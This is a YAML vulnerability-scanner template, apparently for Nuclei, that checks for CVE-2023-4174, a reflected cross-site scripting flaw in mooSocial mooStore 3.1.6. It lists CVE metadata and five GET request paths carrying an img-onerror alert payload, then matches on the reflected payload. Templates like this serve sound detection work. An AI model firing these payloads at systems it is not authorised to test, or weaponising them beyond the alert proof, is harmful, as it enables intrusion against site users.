55 lines
2.0 KiB
YAML
55 lines
2.0 KiB
YAML
id: CVE-2023-4174
|
|
|
|
info:
|
|
name: mooSocial 3.1.6 - Reflected Cross Site Scripting
|
|
author: momika233
|
|
severity: medium
|
|
description: |
|
|
A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/51671
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-4174
|
|
- https://packetstormsecurity.com/files/174017/Social-Commerce-3.1.6-Cross-Site-Scripting.html
|
|
- https://vuldb.com/?ctiid.236209
|
|
- https://vuldb.com/?id.236209
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2023-4174
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00209
|
|
cpe: cpe:2.3:a:moosocial:moostore:3.1.6:*:*:*:*:*:*:*
|
|
epss-percentile: 0.58186
|
|
metadata:
|
|
max-request: 5
|
|
verified: true
|
|
fofa-query: icon_hash="702863115"
|
|
vendor: moosocial
|
|
product: moostore
|
|
tags: packetstorm,cve,cve2023,moosocial,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/search/index?q="><img+src=a+onerror=alert(document.domain)>ridxm'
|
|
- '{{BaseURL}}/stores"><img+src=a+onerror=alert(document.domain)>ridxm/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent'
|
|
- '{{BaseURL}}/user_info"><img+src=a+onerror=alert(document.domain)>ridxm/index/friends'
|
|
- '{{BaseURL}}/faqs"><img+src=a+onerror=alert(document.domain)>ridxm/index?content_search="><img+src=a+onerror=alert(document.domain)>ridxm'
|
|
- '{{BaseURL}}/classifieds"><img+src=a+onerror=alert(document.domain)>ridxm/search?category=1'
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<img src=a onerror=alert(document.domain)>ridxm"
|
|
- "mooSocial"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|